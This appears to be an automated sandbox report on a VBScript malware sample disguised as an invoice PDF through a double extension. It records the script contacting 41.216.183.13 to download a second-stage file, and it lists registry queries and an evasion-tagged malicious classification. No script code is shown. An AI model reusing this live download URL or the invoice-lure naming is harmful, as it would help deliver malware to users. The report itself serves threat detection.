Source: #Inv_PI29467018.pdf.vbs |
ReversingLabs: Detection: 18% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 93.8% probability |
Source: Yara match |
File source: #Inv_PI29467018.pdf.vbs, type: SAMPLE |
Source: C:\Windows\System32\wscript.exe |
Network Connect: 41.216.183.13 80 |
Jump to behavior |
Source: Joe Sandbox View |
IP Address: 41.216.183.13 41.216.183.13 |
Source: Joe Sandbox View |
ASN Name: AS40676US AS40676US |
Source: global traffic |
HTTP traffic detected: GET /Users_API/gavrels/file_splnzgmx.ozu.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 41.216.183.13Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 41.216.183.13 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 41.216.183.13 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 41.216.183.13 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 41.216.183.13 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 41.216.183.13 |
Source: global traffic |
HTTP traffic detected: GET /Users_API/gavrels/file_splnzgmx.ozu.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 41.216.183.13Connection: Keep-Alive |
Source: wscript.exe, 00000000.00000003.2107641600.000002107CC36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107759287.000002107CC3E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://41.216.183. |
Source: wscript.exe, 00000000.00000003.2327531639.000002107D6D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348637622.000002107D6CB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://41.216.183.13/Users_API/gavre |
Source: wscript.exe, 00000000.00000003.2107759287.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107806609.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347160909.000002107ADF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107560179.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348408579.000002107CC30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107005392.000002107CC3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107894778.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347297777.000002107CC4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2327531639.000002107D6D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2346825922.000002107AE2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347363700.000002107AE0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2346863401.000002107AE2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347199674.000002107AE05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347442444.000002107D105000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348198584.000002107AE34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107039232.000002107AE05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348637622.000002107D6CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107852065.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, #Inv_PI29467018.pdf.vbs |
String found in binary or memory: http://41.216.183.13/Users_API/gavrels/file_splnzgmx.ozu.txt |
Source: wscript.exe, 00000000.00000003.2107759287.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107806609.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107560179.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107894778.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347297777.000002107CC4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107852065.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://41.216.183.13/Users_API/gavrels/file_splnzgmx.ozu.txt. |
Source: wscript.exe, 00000000.00000003.2347247324.000002107ADDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348145195.000002107ADEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347799903.000002107ADEC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://41.216.183.13/Users_API/gavrels/file_splnzgmx.ozu.txtssesROAMIN |
Source: wscript.exe, 00000000.00000003.2347327797.000002107CC32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348423660.000002107CC33000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://41.216.183.13/Users_APhO |
Source: wscript.exe, 00000000.00000003.2327531639.000002107D6D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348637622.000002107D6CB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} |
Jump to behavior |
Source: #Inv_PI29467018.pdf.vbs |
Initial sample: Strings found which are bigger than 50 |
Source: classification engine |
Classification label: mal84.spre.evad.winVBS@1/0@0/1 |
Source: unknown |
Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#Inv_PI29467018.pdf.vbs" |
Source: C:\Windows\System32\wscript.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: #Inv_PI29467018.pdf.vbs |
ReversingLabs: Detection: 18% |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mlang.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msxml6.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msxml3.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 |
Jump to behavior |
Source: Possible double extension: pdf.vbs |
Static PE information: #Inv_PI29467018.pdf.vbs |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Window found: window name: WSH-Timer |
Jump to behavior |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: wscript.exe, 00000000.00000002.2348637622.000002107D6B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW0c |
Source: wscript.exe, 00000000.00000003.2327531639.000002107D6F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348637622.000002107D6F3000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: wscript.exe, 00000000.00000002.2348302837.000002107AE9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2346863401.000002107AE83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347069626.000002107AE96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2346746822.000002107AE83000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWi |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Windows\System32\wscript.exe |
Network Connect: 41.216.183.13 80 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |